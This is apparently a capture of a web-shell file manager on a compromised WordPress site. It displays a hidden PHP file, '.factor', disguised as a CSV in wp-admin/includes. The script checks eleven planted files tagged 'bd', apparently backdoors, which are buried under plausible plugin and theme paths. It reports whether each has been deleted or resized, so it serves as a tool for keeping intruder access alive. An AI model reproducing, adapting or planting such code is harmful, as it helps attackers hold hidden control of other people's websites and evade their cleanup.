X

Create New Item

File Folder

X

Search Results

File ".factor"

Full path: /home/vblioqus/luckylandslots.pro/wp-admin/includes/.factor
File size: 1.73 KiB (1769 bytes)
MIME-type: text/csv
Charset: utf-8

Download   Open   Edit   Advanced Edit   Back

<?php   $r = '/home/vblioqus/luckylandslots.pro'; $x = ["/wp-admin/includes/ms-deprecated.php"=>"bd@@14065@@84",
"/wp-includes/registration-functions.php"=>"bd@@14242@@73",
"/wp-content/themes/kadence/inc/customizer/react/class-kadence-control-measure.php"=>"bd@@14407@@64",
"/wp-content/plugins/webp-converter-for-media/webp-converter-for-media.php"=>"bd@@14515@@41",
"/wp-content/plugins/jetpack/_inc/blocks/business-hours/view.asset.php"=>"bd@@14676@@80",
"/wp-content/plugins/file-manager-advanced/application/library/php-parser/vendor/nikic/php-parser/lib/PhpParser/Node/Stmt/TraitUseAdaptation/album_comment.php"=>"bd@@14709@@917",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Framework/MockObject/Builder/Match.php"=>"bd@@14721@@968",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-forms/dist/blocks/field-rating/php_http_proxy.php"=>"bd@@14735@@891",
"/wp-content/plugins/seo-by-rank-math/vendor/wp-media/wp-mixpanel/src/Classes/Base/uc.php"=>"bd@@14750@@986",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-connection/src/webhooks/class.authorize.redirect.php"=>"bd@@14762@@940",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-videopress/build/divi-editor/Strategy.php"=>"bd@@12846@@1014"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');